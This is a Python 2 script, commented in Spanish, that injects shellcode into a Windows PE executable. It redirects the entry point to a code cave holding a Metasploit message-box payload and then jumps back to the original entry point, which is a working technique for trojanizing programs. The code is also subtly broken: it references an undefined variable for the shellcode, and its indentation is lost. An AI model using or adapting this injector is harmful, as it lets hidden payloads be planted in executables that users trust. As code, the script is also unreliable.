from pefile import PE
from struct import pack
# windows/messagebox - 265 bytes
# http://www.metasploit.com
# ICON=NO, TITLE=W00t!, EXITFUNC=process, VERBOSE=false,
# TEXT=Debasish Was Here!
sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" +
"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d" +
"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01" +
"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
"\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89" +
"\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45" +
"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" +
"\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" +
"\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56\xff\x55" +
"\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52\xe8" +
"\x61\xff\xff\xff\x68\x21\x58\x20\x20\x68\x57\x30\x30\x74" +
"\x31\xdb\x88\x5c\x24\x05\x89\xe3\x68\x65\x21\x58\x20\x68" +
"\x20\x48\x65\x72\x68\x20\x57\x61\x73\x68\x73\x69\x73\x68" +
"\x68\x44\x65\x62\x61\x31\xc9\x88\x4c\x24\x12\x89\xe1\x31" +
"\xd2\x52\x53\x51\x52\xff\xd0")
if __name__ == '__main__':
ejecutable = raw_input('[*] Ingrese direccion del ejecutable a inyectar codigo :')
salida = raw_input('[*] ingrese lugar a guardar el ejecutable modificado :')
pe = PE(ejecutable)
# Determinamos el punto de entrada del ejecutable (OEP [original entry point])
OEP = pe.OPTIONAL_HEADER.AddressOfEntryPoint
# los valores que necesitaremos
secciones = pe.get_section_by_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
alineacion = pe.OPTIONAL_HEADER.SectionAlignment # por lo general equivale al valor de
#una pagina en memoria: 4096 bytes.
# cuanto espacio queda
restante = (secciones.VirtualAddress + secciones.Misc_VirtualSize) - pe.OPTIONAL_HEADER.AddressOfEntryPoint
fin_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint + restante
# alineamos con las secciones
espacio = alineacion - (fin_rva % alineacion)
fin_offset = pe.get_offset_from_rva(fin_rva+espacio) - 1 # calculamos el RVA del final del offset,
# ...para que este alineado con las otras secciones
# comprobar si hay suficiente espacio para adaptarse a la carga util
tc_shell = len(codigo_shell)+7 # +1 pusha, +1 popa, +5 rel32 jmp
# 80x86 Instructions by Opcode :
# Opcode Mnemonic Operand(s) Flags-affected Number-of-bytes Timing-386 Timing-486 Timing-Pentium
# E9 jmp rel32 none 5 7+ 3 1
if espacio < tc_shell:
# no hay suficiente espacio para el shell code
exit()
# el codigo puede ser inyectado
scode_end_off = fin_offset
scode_start_off = scode_end_off - tc_shell
pe.OPTIONAL_HEADER.AddressOfEntryPoint = pe.get_rva_from_offset(scode_start_off)
raw_pe_data = pe.write()
jmp_to = OEP - pe.get_rva_from_offset(scode_end_off)
# \x60 = pusha, \x61 = popa, \xe9 = 32 bit relative distance
codigo_shell = '\x60%s\x61\xe9%s' % (codigo_shell, pack('I', jmp_to & 0xffffffff))
final_data = list(raw_pe_data)
final_data[scode_start_off:scode_start_off+len(codigo_shell)] = codigo_shell
final_data = ''.join(final_data)
raw_pe_data = final_data
pe.close()
new_file = open(salida, 'wb')
new_file.write(raw_pe_data)
new_file.close()
print '[*] trabajo hecho! :)'